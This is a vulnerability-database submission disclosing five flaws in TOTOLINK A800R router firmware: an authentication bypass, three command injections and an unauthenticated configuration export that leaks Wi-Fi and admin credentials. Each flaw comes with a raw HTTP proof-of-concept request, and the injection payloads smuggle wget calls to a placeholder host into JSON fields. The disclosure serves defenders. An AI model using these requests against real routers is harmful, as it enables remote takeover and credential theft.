Submit #792433: Totolink A8000R V5.9c.681_B20180413 Improper Authenticationinfo

TitleTotolink A8000R V5.9c.681_B20180413 Improper Authentication
Description# TOTOLINK A800R V5.9c.681 - Multiple Vulnerabilities Report ## Vulnerability 1: Authentication Bypass in cstecgi.cgi **Type:** Authentication Bypass (CWE-306) **Severity:** Critical (CVSS 9.8) **Product:** TOTOLINK A800R **Firmware:** V5.9c.681_B20180413 **File:** /cgi-bin/cstecgi.cgi ### Description The TOTOLINK A800R V5.9c.681_B20180413 router has an authentication bypass vulnerability. The cstecgi.cgi does not verify session cookies or authentication tokens. An unauthenticated remote attacker can directly send POST requests to /cgi-bin/cstecgi.cgi to invoke any setting function without login. ### Proof of Concept ``` POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: <target> Content-Type: application/json {"topicurl":"setting/setLanguageCfg","langType":"test"} ``` The server returns `{"success":true}` without any authentication. --- ## Vulnerability 2: Command Injection in setLanguageCfg **Type:** OS Command Injection (CWE-78) **Severity:** Critical (CVSS 9.8) **Product:** TOTOLINK A800R **Firmware:** V5.9c.681_B20180413 **File:** /lib/cste_modules/global.so **Function:** setLanguageCfg ### Description The setLanguageCfg function in global.so takes user input from the `langType` parameter and passes it directly to `sprintf("flash set LANGUAGE_TYPE %s")` followed by `CsteSystem()` (equivalent to system()) without any input sanitization. Combined with Vulnerability 1 (authentication bypass), this allows unauthenticated remote code execution. ### Proof of Concept ``` POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: <target> Content-Type: application/json {"topicurl":"setting/setLanguageCfg","langType":";wget http://<dnslog>;"} ``` --- ## Vulnerability 3: Command Injection in setUpgradeFW **Type:** OS Command Injection (CWE-78) **Severity:** Critical (CVSS 9.8) **Product:** TOTOLINK A800R **Firmware:** V5.9c.681_B20180413 **File:** /lib/cste_modules/upgrade.so **Function:** setUpgradeFW -> dl() ### Description The dl() function in upgrade.so constructs a command using `sprintf("wget -O %s %s", FileName, DlFileUrl)` and passes it to `CsteSystem()` without sanitizing user input. The `FileName` and `DlFileUrl` parameters are attacker-controlled. Combined with Vulnerability 1, this allows unauthenticated remote code execution. ### Proof of Concept ``` POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: <target> Content-Type: application/json {"topicurl":"setting/setUpgradeFW","FileName":";wget http://<dnslog>;"} ``` --- ## Vulnerability 4: Command Injection in setNTPCfg **Type:** OS Command Injection (CWE-78) **Severity:** High (CVSS 8.8) **Product:** TOTOLINK A800R **Firmware:** V5.9c.681_B20180413 **File:** /lib/cste_modules/system.so **Function:** setNTPCfg ### Description The setNTPCfg function stores the user-supplied `NTPServerIP` parameter into nvram and then calls `CsteSystem("sysconf ntp")`. The ntp.sh script reads NTPServerIP from nvram and passes it unsanitized to shell commands, enabling command injection. ### Proof of Concept ``` POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: <target> Content-Type: application/json {"topicurl":"setting/setNTPCfg","NTPServerIP":"$(wget http://<dnslog>)","NTPSync":"24","NTPClientEnabled":"ON","time_zone":"UTC+0"} ``` --- ## Vulnerability 5: Information Disclosure via ExportSettings.sh **Type:** Information Disclosure (CWE-200) **Severity:** High (CVSS 7.5) **Product:** TOTOLINK A800R **Firmware:** V5.9c.681_B20180413 **File:** /cgi-bin/ExportSettings.sh ### Description The ExportSettings.sh script exports the entire device configuration (config.dat) including WiFi passwords, admin credentials, DDNS settings, and all other sensitive information. This script contains no authentication check and can be accessed by any unauthenticated remote attacker. ### Proof of Concept ``` GET /cgi-bin/ExportSettings.sh HTTP/1.1 Host: <target> ``` Returns the full device configuration file. --- ## Timeline - 2026-03-29: Vulnerabilities discovered - 2026-03-29: Report submitted to CVE ## Credit skeet
Source⚠️ https://github.com/skeetabc/CVE-TOTOLINK-A800R
User
 skeet (UID 96893)
Submission03/29/2026 17:15 (9 days ago)
Moderation04/06/2026 11:38 (8 days later)
StatusAccepted
VulDB entry355503 [Totolink A8000R 5.9c.681_B20180413 /cgi-bin/cstecgi.cgi setLanguageCfg langType missing authentication]
Points20

PreviousOverviewNext

Want to know what is going to be exploited?

We predict KEV entries!